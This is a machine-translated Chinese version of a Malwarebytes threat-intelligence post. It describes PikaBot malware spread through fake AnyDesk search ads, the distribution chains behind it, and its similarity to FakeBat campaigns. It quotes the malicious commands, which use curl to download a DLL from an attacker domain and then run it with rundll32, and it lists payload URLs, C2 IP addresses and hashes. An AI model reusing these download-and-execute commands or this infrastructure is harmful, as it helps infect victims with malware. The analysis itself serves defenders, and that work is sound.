在过去的一年中,我们发现恶意广告的使用有所增加,特别是通过搜索引擎投放针对企业的恶意软件的广告。事实上,如果我们包括社会工程活动,基于浏览器的攻击总体上要常见得多。
犯罪分子通过搜索广告成功获得了新的受害者;我们相信有专门的服务可以帮助恶意软件分发者和附属公司绕过谷歌的安全措施并帮助他们建立诱饵基础设施。特别是,我们看到了与之前用于删除 FakeBat 的恶意广告链的相似之处。
在过去的几天里,包括我们在内的研究人员观察到了 PikaBot,这是一个于 2023 年初出现的新恶意软件家族,通过恶意广告进行传播。PikaBot 以前仅通过与 QakBot 类似的恶意垃圾邮件活动进行分发,并成为 TA577 威胁行为者的首选有效负载之一。
PikaBot 通过恶意垃圾邮件
PikaBot 首次被 Unit 42 于 2023 年 2 月确定为可能是从恶意垃圾邮件活动中掉落的 Matanbuchus。PikaBot 这个名称后来被命名为TA577,Proofpoint 发现该威胁参与者参与了 QakBot、IcedID、SystemBC 等有效负载的分发以及钴打击。更重要的是,TA577 与勒索软件分发有关。
Cofense 的研究人员观察到,继 2023 年 8 月取消QakBot 僵尸网络之后,同时传播 DarkGate 和 PikaBot 的恶意垃圾邮件活动有所增加。PikaBot的典型分发链通常以包含外部网站链接的电子邮件(被劫持的线程)开始。用户被诱骗下载包含恶意 JavaScript 的 zip 存档。
JavaScript 创建一个随机目录结构,通过curl实用程序从外部网站检索恶意负载:
"C:WindowsSystem32cmd.exe" /c mkdir C:GkooegsglitrgDkrogirbksri & curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:GkooegsglitrgDkrogirbksriWkkfgujbsrbuj.dll
curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:GkooegsglitrgDkrogirbksriWkkfgujbsrbuj.dll
然后它通过rundll32执行 paylod (DLL) :
rundll32 C:GkooegsglitrgDkrogirbksriWkkfgujbsrbuj.dll,Enter
正如OALabs 所描述的,PikaBot 的核心模块随后被注入到合法的SearchProtocolHost.exe进程中。PikaBot 的加载程序还通过使用间接系统调用隐藏其注入,使恶意软件非常隐蔽。
通过恶意广告进行分发
该活动的目标是 Google 搜索远程应用程序 AnyDesk。安全研究员 Colin Cowie观察了分发链,后来Ole Villadsen确认有效负载是 PikaBot 。
我们还通过另一则冒充 AnyDesk 品牌的广告看到了该活动,该广告属于假冒角色“Manca Marina”:
诱饵网站已在anadesky[.]ovmv[.]net设置:
下载的是经过数字签名的 MSI 安装程序。值得注意的是,在我们收集它时,它在 VirusTotal 上的检测为零。然而,更有趣的方面是它如何在执行时逃避检测。
JoeSandbox的下图总结了执行流程:
恶意广告与 FakeBat 的相似之处
威胁行为者通过合法的营销平台使用跟踪 URL 绕过 Google 的安全检查,重定向到 Cloudflare 后面的自定义域。此时,只有干净的 IP 地址才会转发到下一步。
他们通过 JavaScript 执行指纹识别,以确定用户是否正在运行虚拟机等。只有在检查成功后,我们才会看到重定向到主登陆页面(诱骗 AnyDesk 站点)。
有趣的是,当用户单击下载按钮时,会进行第二次指纹识别尝试。这可能会确保下载链接在虚拟化环境中不起作用。在此特定活动中,威胁参与者在 Dropbox 上托管 MSI 安装程序。
我们注意到,以前的恶意广告链通过 onelink[.]me 以及 URL 结构使用相同的重定向机制。这些事件之前已向 Google 报告,并针对Zoom和 Slack 搜索广告:
在其中一些实例中,我们已将有效负载识别为 FakeBat。这特别有趣,因为它指向不同威胁行为者使用的通用流程。也许,这类似于“恶意广告即服务”,即向恶意软件分发者提供 Google 广告和诱饵页面。
结论
几年前,漏洞利用工具包是通过偷渡式下载的主要恶意软件分发媒介。随着浏览器及其插件中的漏洞开始变得不那么有效,威胁行为者开始集中向目标企业发送垃圾邮件。然而,有些人确实继续以浏览器为目标,但不得不依靠社交工程,用虚假的浏览器更新来引诱受害者。
通过恶意广告,我们看到了另一个强大的传递媒介,它不需要用户访问受感染的网站。相反,威胁行为者利用搜索引擎,简单地购买他们知道目标会接触到的广告。正如我们之前所说,企业可以通过只允许最终用户通过自己的可信存储库安装应用程序来防止这种风险。
IOC
恶意域名
anadesky[.]ovmv[.]net
cxtensones[.]top
Dropbox 有效负载
dropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq
dropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu
dropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj
PikaBot hashes
0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320
PikaBot C2s
172[.]232[.]186[.]251
57[.]128[.]83[.]129
57[.]128[.]164[.]11
57[.]128[.]108[.]132
139[.]99[.]222[.]29
172[.]232[.]164[.]77
54[.]37[.]79[.]82
172[.]232[.]162[.]198
57[.]128[.]109[.]221
参考链接:https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads?&web_view=true
图片来源网络目标可联系删除